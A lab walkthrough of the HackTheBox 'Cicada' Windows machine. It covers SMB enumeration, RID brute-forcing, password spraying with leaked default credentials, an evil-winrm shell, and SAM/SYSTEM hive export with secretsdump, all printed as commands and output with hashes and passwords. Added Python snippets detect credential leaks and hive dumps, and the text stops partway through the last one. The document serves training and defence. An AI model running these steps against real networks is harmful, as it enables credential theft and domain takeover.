HackTheBox Cicada Walkthrough

My first HTB machine; lately I still prefer Windows targets, so I started with an easy one.
Tip: common Windows information gathering.
My biggest impression: it is slow, far worse than a local box.

Port scan. Since the box is online, I left out the -p- option.

└─$ nmap -sV -sC -Pn  -oN port.log $IP   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-06 09:33 CST
Nmap scan report for 10.10.11.35
Host is up (0.34s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-06 08:34:18Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Port 445 is open, so as usual we start with SMB.

└─$ netexec smb $IP
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)

└─$ netexec winrm $IP
WINRM       10.10.11.35     5985   CICADA-DC        [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)

└─$ smbclient -NL $IP

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        DEV             Disk      
        HR              Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.35 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) 
Unable to connect with SMB1 -- no workgroup available

The anonymous user can access the HR share.

└─$ smbclient //$IP/HR                    
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 20:29:09 2024
  ..                                  D        0  Thu Mar 14 20:21:29 2024
  Notice from HR.txt                  A     1266  Thu Aug 29 01:31:48 2024

                4168447 blocks of size 4096. 418595 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)

Open the letter HR left behind; it contains the default password for new hires.

└─$ cat Notice\ from\ HR.txt 

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

The next task is to find usernames; here we use the --rid-brute feature of netexec smb.

└─$ netexec smb $IP -u 'anonymous' -p '' --rid-brute                                                                                                                         
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)                
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\anonymous: (Guest)                                                                                        
SMB         10.10.11.35     445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)                                                       
SMB         10.10.11.35     445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)                                                                                  
SMB         10.10.11.35     445    CICADA-DC        501: CICADA\Guest (SidTypeUser)                                                                                          
SMB         10.10.11.35     445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)                                                                                         
SMB         10.10.11.35     445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)                                                                                 
SMB         10.10.11.35     445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)                                                                                  
SMB         10.10.11.35     445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)                                                                                 
SMB         10.10.11.35     445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)                       
SMB         10.10.11.35     445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)                     
SMB         10.10.11.35     445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)                        
SMB         10.10.11.35     445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)                          
SMB         10.10.11.35     445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)                      
SMB         10.10.11.35     445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)                                                                   
SMB         10.10.11.35     445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)                                                                  
SMB         10.10.11.35     445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)                                                                  
SMB         10.10.11.35     445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)                                                                               
SMB         10.10.11.35     445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)                                                                                    
SMB         10.10.11.35     445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)                                                                         
SMB         10.10.11.35     445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)                                                                           
SMB         10.10.11.35     445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)                                                       
SMB         10.10.11.35     445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)                                                        
SMB         10.10.11.35     445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)                                                                                    
SMB         10.10.11.35     445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)                                                                                    
SMB         10.10.11.35     445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)                                                                               
SMB         10.10.11.35     445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)                                                                                       
SMB         10.10.11.35     445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)    
SMB         10.10.11.35     445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)   
SMB         10.10.11.35     445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

One command pulls the names out of the output above to build a username dictionary (the netexec output was saved to user_enum.txt first; redirect the pipeline's output to users.txt).

└─$ cat user_enum.txt|awk -F'CICADA\\\\| \\(' '{print $2}' | sed 's/[[:space:]]*$//'
Enterprise Read-only Domain Controllers
Administrator
Guest
krbtgt
Domain Admins
Domain Users
Domain Guests
Domain Computers
Domain Controllers
Cert Publishers
Schema Admins
Enterprise Admins
Group Policy Creator Owners
Read-only Domain Controllers
Cloneable Domain Controllers
Protected Users
Key Admins
Enterprise Key Admins
RAS and IAS Servers
Allowed RODC Password Replication Group
Denied RODC Password Replication Group
CICADA-DC$
DnsAdmins
DnsUpdateProxy
Groups
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
Dev Support
emily.oscars
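The awk pipeline keeps every resolved name, groups and aliases included, which is why the password spray later in the walkthrough reports a long run of Guest logons for group names. As an added example that is not part of the original walkthrough, this Python parser reads the same netexec --rid-brute output and keeps only SidTypeUser entries, dropping built-in RIDs below 1000 and machine accounts unless asked for; the sample lines are a constructed subset of the output above.

```python
import re
from typing import List, Tuple

# Constructed sample of netexec --rid-brute output (a subset of the rows shown
# above, in the same shape; the first two lines are the banner and logon line).
RID_BRUTE_OUTPUT = """\
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\\anonymous: (Guest)
SMB         10.10.11.35     445    CICADA-DC        500: CICADA\\Administrator (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        513: CICADA\\Domain Users (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        517: CICADA\\Cert Publishers (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        1000: CICADA\\CICADA-DC$ (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1104: CICADA\\john.smoulder (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1109: CICADA\\Dev Support (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1601: CICADA\\emily.oscars (SidTypeUser)
"""

# One resolved RID looks like "<rid>: <DOMAIN>\<name> (<SidType>)"; the name
# may contain spaces ("Domain Users"), so it is matched lazily up to the type.
RID_LINE = re.compile(
    r"(?P<rid>\d+):\s+(?P<domain>[^\\]+)\\(?P<name>.+?)\s+\((?P<sidtype>SidType\w+)\)\s*$"
)


def parse_rid_brute(text: str) -> List[Tuple[int, str, str]]:
    """Return (rid, name, sidtype) for every resolved RID line; banner and
    logon lines carry no "<digits>: " prefix and are skipped."""
    entries = []
    for line in text.splitlines():
        m = RID_LINE.search(line)
        if m:
            entries.append((int(m.group("rid")), m.group("name"), m.group("sidtype")))
    return entries


def user_accounts(entries: List[Tuple[int, str, str]],
                  include_builtin: bool = False,
                  include_machines: bool = False) -> List[str]:
    """Keep only SidTypeUser names. Built-in accounts (RID < 1000, e.g.
    Administrator, Guest, krbtgt) and machine accounts (trailing '$') are
    dropped by default because they are never the owner of a new-hire password."""
    names = []
    for rid, name, sidtype in entries:
        if sidtype != "SidTypeUser":
            continue
        if not include_builtin and rid < 1000:
            continue
        if not include_machines and name.endswith("$"):
            continue
        names.append(name)
    return names


if __name__ == "__main__":
    for name in user_accounts(parse_rid_brute(RID_BRUTE_OUTPUT)):
        print(name)
```

Feed it the saved user_enum.txt instead of the constant to get the user-only list for the real output.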

Spray the password across the list to see which user it belongs to.

└─$ netexec smb $IP -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Enterprise Read-only Domain Controllers:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Domain Admins:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Domain Users:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Domain Guests:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Domain Computers:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Domain Controllers:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Cert Publishers:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Schema Admins:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Enterprise Admins:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Group Policy Creator Owners:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Read-only Domain Controllers:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Cloneable Domain Controllers:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Protected Users:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Key Admins:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Enterprise Key Admins:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\RAS and IAS Servers:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Allowed RODC Password Replication Group:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Denied RODC Password Replication Group:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\DnsAdmins:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\DnsUpdateProxy:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Groups:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Dev Support:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE

This identifies the user michael.wrightson. Checking the SMB permissions again, nothing has changed compared with the anonymous user.

└─$ smbmap -H $IP -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                      

[+] IP: 10.10.11.35:445 Name: cicada.htb                Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        DEV                                                     NO ACCESS
        HR                                                      READ ONLY
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share

Next, enum4linux or rpcclient can be run with the username and password to enumerate further, which yields another username and password.

└─$ enum4linux  -a -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' $IP

That result is the same as what the following command produces:

└─$ rpcclient -U  "michael.wrightson"  $IP -c "querydispinfo"
 ========================================( Users on 10.10.11.35 )========================================                                                                    

index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer/domain                                 
index: 0xfeb RID: 0x454 acb: 0x00000210 Account: david.orelious Name: (null)    Desc: Just in case I forget my password is aRt$Lp#7t*VQ!3                                    
index: 0x101d RID: 0x641 acb: 0x00000210 Account: emily.oscars  Name: Emily Oscars      Desc: (null)                                                                         
index: 0xedb RID: 0x1f5 acb: 0x00000214 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain                                       
index: 0xfe7 RID: 0x450 acb: 0x00000210 Account: john.smoulder  Name: (null)    Desc: (null)                                                                                 
index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account                                                        
index: 0xfe9 RID: 0x452 acb: 0x00000210 Account: michael.wrightson      Name: (null)    Desc: (null)                                                                         
index: 0xfe8 RID: 0x451 acb: 0x00000210 Account: sarah.dantelia Name: (null)    Desc: (null)

We now have david's password. Checking the SMB permissions again, the DEV share has become readable.

└─$ smbmap -u  'david.orelious' -p 'aRt$Lp#7t*VQ!3' -H $IP

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                      

[+] IP: 10.10.11.35:445 Name: cicada.htb                Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        DEV                                                     READ ONLY
        HR                                                      READ ONLY
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share

Enter the DEV share and find a PowerShell script.

└─$ smbclient //$IP/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3' 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 20:31:39 2024
  ..                                  D        0  Thu Mar 14 20:21:29 2024
  Backup_script.ps1                   A      601  Thu Aug 29 01:28:22 2024

                4168447 blocks of size 4096. 417422 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)

The script contains yet another user's password.

└─$ cat Backup_script.ps1 

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
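Two of the findings above come from the same kind of gap: a credential written into an AD account's description field (david.orelious, readable by any authenticated user through querydispinfo) and a plaintext password in a script left on a readable share (Backup_script.ps1). As an added example, not code from the walkthrough, the Python below runs the two checks an auditor would script for this: it flags description fields that mention a password and PowerShell lines that embed a literal secret. The sample input is constructed to mirror the rpcclient output and the script above, with made-up secret values.

```python
import re
from typing import List

# Constructed sample in the shape of "rpcclient -c querydispinfo" output.
# The secret in the description is made up for this example.
QUERYDISPINFO_OUTPUT = """\
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer/domain
index: 0xfeb RID: 0x454 acb: 0x00000210 Account: david.orelious Name: (null)    Desc: Just in case I forget my password is Example#Pass1
index: 0x101d RID: 0x641 acb: 0x00000210 Account: emily.oscars  Name: Emily Oscars      Desc: (null)
index: 0xfe7 RID: 0x450 acb: 0x00000210 Account: john.smoulder  Name: (null)    Desc: Contractor, ext. 4411
"""

# Constructed sample in the shape of Backup_script.ps1, with a made-up secret.
BACKUP_SCRIPT = """\
$sourceDirectory = "C:\\smb"
$username = "emily.oscars"
$password = ConvertTo-SecureString "ExamplePlain#2" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
"""

DISPINFO_LINE = re.compile(
    r"Account:\s+(?P<account>\S+)\s+Name:\s+(?P<name>.*?)\s+Desc:\s+(?P<desc>.*)$"
)
# Words that, inside a description field, usually mean a secret was written there.
SECRET_WORDS = re.compile(r"\b(password|passwd|pwd|pass|secret|pin)\b", re.IGNORECASE)

# PowerShell shapes that embed a literal secret: a string handed to
# ConvertTo-SecureString -AsPlainText, or a plain assignment such as $password = "...".
SCRIPT_PATTERNS = [
    ("ConvertTo-SecureString literal",
     re.compile(r'''ConvertTo-SecureString\s+["']([^"']+)["']\s+-AsPlainText''', re.IGNORECASE)),
    ("plain-text variable",
     re.compile(r'''\$(?:password|passwd|pwd|pass|secret)\s*=\s*["']([^"']+)["']''', re.IGNORECASE)),
]


def description_leaks(text: str) -> List[dict]:
    """Accounts whose description field mentions a password-like word.
    Any authenticated domain user can read this attribute, so a hit is a
    finding regardless of which admin wrote it."""
    findings = []
    for line in text.splitlines():
        m = DISPINFO_LINE.search(line)
        if not m:
            continue
        desc = m.group("desc").strip()
        if desc == "(null)" or not SECRET_WORDS.search(desc):
            continue
        findings.append({"account": m.group("account"), "desc": desc})
    return findings


def script_leaks(script: str) -> List[dict]:
    """Lines of a PowerShell script that carry a literal credential.
    Only the length of the secret is reported, so the report itself
    does not reproduce the password."""
    findings = []
    for lineno, line in enumerate(script.splitlines(), start=1):
        for kind, pattern in SCRIPT_PATTERNS:
            m = pattern.search(line)
            if m:
                findings.append({"line": lineno, "kind": kind, "secret_len": len(m.group(1))})
    return findings


if __name__ == "__main__":
    for f in description_leaks(QUERYDISPINFO_OUTPUT):
        print(f"description leak: {f['account']}: {f['desc']}")
    for f in script_leaks(BACKUP_SCRIPT):
        print(f"script leak: line {f['line']} ({f['kind']}, {f['secret_len']} chars)")
```

The intended fix on the defending side is the same in both cases: rotate the exposed account, clear the description attribute, and move the backup job's credential into a managed service account or a credential store instead of the script.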

Log in to a shell as emily to get the user flag.

└─$ evil-winrm -i $IP -u  'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

Check the privileges: backup is allowed, so the next step is the routine export of the SAM and SYSTEM hives.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system system
The operation completed successfully.

└─$ impacket-secretsdump LOCAL -system system -sam sam                                                                                                                       
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies                                                                                                        

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620                                                                                                                
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)                                                                                                                         
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::                                                                                       
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                                                               
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                                                      
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.                                                                     
[*] Cleaning up...
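From the detection side, the steps above leave a clear trail: event 4672 records SeBackupPrivilege being assigned to the new logon, and event 4688 (with command-line auditing enabled) records reg.exe saving the SAM and SYSTEM hives. As an added example that is not part of the walkthrough, this Python correlates the two on the logon id and raises an alert when a hive is saved by a logon that received SeBackupPrivilege; the event records and the allow-list EXPECTED_BACKUP_ACCOUNTS are constructed for the example.

```python
import re
from typing import Dict, Iterable, List

# Constructed, simplified Security-log records. Field names follow the Windows
# event schema (4672: special privileges assigned; 4688: process creation),
# but every value below is made up for this example.
EVENTS = [
    {"EventID": 4672, "SubjectUserName": "emily.oscars", "SubjectLogonId": "0x3e7a1",
     "PrivilegeList": "SeBackupPrivilege SeRestorePrivilege SeShutdownPrivilege"},
    {"EventID": 4688, "SubjectUserName": "emily.oscars", "SubjectLogonId": "0x3e7a1",
     "NewProcessName": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg save hklm\\sam sam"},
    {"EventID": 4688, "SubjectUserName": "emily.oscars", "SubjectLogonId": "0x3e7a1",
     "NewProcessName": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg save hklm\\system system"},
    {"EventID": 4672, "SubjectUserName": "svc_backup", "SubjectLogonId": "0x41b22",
     "PrivilegeList": "SeBackupPrivilege SeRestorePrivilege"},
    {"EventID": 4688, "SubjectUserName": "svc_backup", "SubjectLogonId": "0x41b22",
     "NewProcessName": "C:\\Windows\\System32\\wbadmin.exe",
     "CommandLine": "wbadmin start backup -backupTarget:D: -include:C:\\smb"},
]

# Accounts expected to hold backup rights (an assumed allow-list for the example).
EXPECTED_BACKUP_ACCOUNTS = {"svc_backup"}

# "reg save hklm\sam ...", "reg.exe save hklm\system ...", also the SECURITY hive.
HIVE_SAVE = re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.IGNORECASE)


def detect_hive_dump(events: Iterable[Dict[str, object]]) -> List[Dict[str, str]]:
    """Walk the events in order and return alerts.

    medium: SeBackupPrivilege granted to a logon whose account is not on the allow-list.
    high:   a registry hive saved to disk by any logon that holds SeBackupPrivilege
            (the allow-listed backup account included, since reg save is not how a
            backup product reads hives)."""
    alerts: List[Dict[str, str]] = []
    backup_logons: Dict[str, str] = {}  # logon id -> account that got SeBackupPrivilege
    for ev in events:
        if ev["EventID"] == 4672 and "SeBackupPrivilege" in str(ev["PrivilegeList"]).split():
            backup_logons[str(ev["SubjectLogonId"])] = str(ev["SubjectUserName"])
            if ev["SubjectUserName"] not in EXPECTED_BACKUP_ACCOUNTS:
                alerts.append({"severity": "medium", "account": str(ev["SubjectUserName"]),
                               "reason": "SeBackupPrivilege granted outside the allow-list"})
        elif ev["EventID"] == 4688:
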